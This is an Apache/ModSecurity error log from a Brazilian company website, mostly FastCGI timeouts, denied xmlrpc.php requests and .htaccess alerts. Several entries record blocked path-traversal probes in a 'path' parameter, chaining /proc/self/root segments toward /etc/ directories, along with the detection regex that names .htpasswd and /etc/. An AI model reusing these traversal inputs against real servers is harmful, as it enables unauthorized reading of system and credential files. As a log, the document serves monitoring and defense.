[Thu Mar 19 18:15:31.171459 2026] [proxy_fcgi:error] [pid 7545:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:15:45.745747 2026] [:error] [pid 7235:tid 140411674785536] [client 57.141.18.15:48788] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/wellhole/tetrachord011224374014.phtml"] [unique_id "abxngfqxLDW4GITHUkSRaAAAAQg"]
[Thu Mar 19 18:15:53.147353 2026] [proxy_fcgi:error] [pid 14269:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53150] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:16:16.501834 2026] [proxy_fcgi:error] [pid 20435:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:53272] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:16:49.152491 2026] [proxy_fcgi:error] [pid 8307:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:53326] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:17:20.441889 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53384] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:17:54.671074 2026] [proxy_fcgi:error] [pid 19655:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:53428] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:18:28.146004 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53466] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:18:51.765831 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:53628] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:19:24.873821 2026] [proxy_fcgi:error] [pid 19655:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:20:33.835900 2026] [proxy_fcgi:error] [pid 7545:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53742] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:20:57.893924 2026] [proxy_fcgi:error] [pid 5816:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:54040] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:21:25.221904 2026] [proxy_fcgi:error] [pid 8307:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54116] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:22:20.497879 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54216] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:23:34.397849 2026] [proxy_fcgi:error] [pid 19655:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54298] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:23:58.985845 2026] [proxy_fcgi:error] [pid 21563:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:54800] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:24:02.867239 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.228.61:59492] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxpcvXLqtnMIWvjpaJHwgAAAoo"]
[Thu Mar 19 18:24:24.985810 2026] [proxy_fcgi:error] [pid 19655:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54936] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:24:42.737478 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.243.128:53754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxpmv-YZRR_7pZ7nDK0pwAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:25:34.185936 2026] [proxy_fcgi:error] [pid 7545:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55018] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:26:40.145992 2026] [proxy_fcgi:error] [pid 7893:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55110] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:27:07.574151 2026] [proxy_fcgi:error] [pid 7893:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55392] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:28:35.765781 2026] [proxy_fcgi:error] [pid 19655:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:55442] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:28:59.808080 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:55628] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:29:21.890277 2026] [proxy_fcgi:error] [pid 7235:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:55916] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:29:43.662028 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56140] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:30:34.265756 2026] [proxy_fcgi:error] [pid 7545:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56260] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:31:04.067715 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.244.43:58278] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxrGOoXxyEfFpUF8f82qwAAAVI"]
[Thu Mar 19 18:31:46.565847 2026] [proxy_fcgi:error] [pid 7893:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:56370] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:32:10.333922 2026] [proxy_fcgi:error] [pid 19655:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56692] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:32:42.037791 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:56866] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:33:36.160012 2026] [proxy_fcgi:error] [pid 19655:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:56922] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:34:16.668094 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:52252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxr2OoXxyEfFpUF8f82sQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:34:43.792814 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57034] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:34:44.971195 2026] [access_compat:error] [pid 7893:tid 140411741927168] [client 195.123.216.134:36368] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 18:34:46.563638 2026] [access_compat:error] [pid 27293:tid 140411599251200] [client 107.189.30.49:42266] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 18:35:08.966080 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.228.61:55334] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxsDPXLqtnMIWvjpaJICAAAAoc"]
[Thu Mar 19 18:35:23.906674 2026] [access_compat:error] [pid 17887:tid 140411699963648] [client 192.42.116.42:57761] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 18:35:29.783023 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57144] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:35:52.873815 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:57590] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:36:14.473869 2026] [proxy_fcgi:error] [pid 15826:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57730] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:36:19.236325 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:58112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxsU-oXxyEfFpUF8f82ygAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 18:36:37.448100 2026] [proxy_fcgi:error] [pid 7893:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57850] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:37:16.717789 2026] [proxy_fcgi:error] [pid 5816:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:57918] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:37:26.630695 2026] [access_compat:error] [pid 26799:tid 140411674785536] [client 84.239.7.134:3429] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 18:37:41.164218 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58128] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:37:44.594039 2026] [access_compat:error] [pid 14269:tid 140411733534464] [client 172.94.108.13:57426] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 18:37:45.961347 2026] [access_compat:error] [pid 14269:tid 140411733534464] [client 51.210.104.64:37027] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 18:37:47.622956 2026] [access_compat:error] [pid 20435:tid 140411691570944] [client 45.154.98.42:40458] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Thu Mar 19 18:37:50.543071 2026] [mime_magic:error] [pid 5816:tid 140411565680384] (70014)End of file found: [client 57.141.18.47:56118] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 18:38:34.717256 2026] [proxy_fcgi:error] [pid 21219:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58270] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:38:37.257050 2026] [core:alert] [pid 7545:tid 140411666392832] [client 57.141.18.3:56638] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:38:56.285835 2026] [proxy_fcgi:error] [pid 20435:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58798] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:39:07.846927 2026] [core:alert] [pid 20435:tid 140411557287680] [client 74.7.243.128:47618] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run
[Thu Mar 19 18:39:08.642062 2026] [core:alert] [pid 21219:tid 140411616036608] [client 57.141.18.61:57020] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:39:18.097868 2026] [proxy_fcgi:error] [pid 27293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59056] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:39:39.176724 2026] [proxy_fcgi:error] [pid 21219:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59222] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:39:52.271093 2026] [mime_magic:error] [pid 8307:tid 140411632822016] (70014)End of file found: [client 57.141.18.98:57404] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 18:39:55.435255 2026] [:error] [pid 8307:tid 140411632822016] [client 74.7.243.128:55672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxtK7-FhjpZGs9ba8qU0wAAAw0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:40:01.723922 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59326] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:40:21.298033 2026] [core:alert] [pid 21563:tid 140411599251200] [client 57.141.18.104:58158] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:40:23.125861 2026] [proxy_fcgi:error] [pid 7235:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:40:24.469510 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.228.61:40988] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxtSP-YZRR_7pZ7nDK0-gAAA9U"]
[Thu Mar 19 18:40:44.129876 2026] [proxy_fcgi:error] [pid 20435:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:59734] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:41:05.521789 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59888] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:41:20.093852 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 57.141.18.102:59502] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 18:41:20.843453 2026] [core:alert] [pid 14269:tid 140411582465792] [client 57.141.18.40:59512] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:41:27.125811 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60038] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:41:28.552550 2026] [core:alert] [pid 7893:tid 140411540502272] [client 57.141.18.54:59664] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:41:48.129826 2026] [proxy_fcgi:error] [pid 7893:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:42:07.177586 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.244.43:57568] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxtrxCii7xarUs8iHYVAgAAAgI"]
[Thu Mar 19 18:42:13.945822 2026] [proxy_fcgi:error] [pid 21563:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60370] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:42:35.131266 2026] [proxy_fcgi:error] [pid 14269:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60700] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:42:55.411465 2026] [mime_magic:error] [pid 27293:tid 140411658000128] (70014)End of file found: [client 57.141.18.24:33190] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 18:42:57.389830 2026] [proxy_fcgi:error] [pid 7893:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:32828] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:43:19.061814 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33046] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:43:51.125802 2026] [proxy_fcgi:error] [pid 21219:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33386] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:43:53.125924 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:44434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxuGda6ubjKNq_cu4Z--gAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 18:44:23.129814 2026] [proxy_fcgi:error] [pid 8307:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33828] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:44:32.337821 2026] [core:alert] [pid 27293:tid 140411699963648] [client 57.141.18.55:35512] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:44:40.871587 2026] [:error] [pid 19655:tid 140411725141760] [client 74.7.243.128:60486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxuSE1ujooLWdUDGy7-fAAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 18:44:58.145782 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34380] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:45:28.437651 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:42862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxuePXLqtnMIWvjpaJImAAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 18:45:35.130172 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35148] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:46:02.137823 2026] [proxy_fcgi:error] [pid 7545:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:46:23.121798 2026] [proxy_fcgi:error] [pid 17887:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36194] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:46:44.120739 2026] [proxy_fcgi:error] [pid 7545:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:47:05.117925 2026] [proxy_fcgi:error] [pid 17653:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36980] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:47:26.129801 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37410] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:47:42.706711 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.244.43:46242] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxu_vu8EFLIOrSqIpvSngAAAlU"]
[Thu Mar 19 18:47:48.125791 2026] [proxy_fcgi:error] [pid 8307:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37890] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:48:10.069807 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38420] AH01075: Error dispatching request to : (polling)
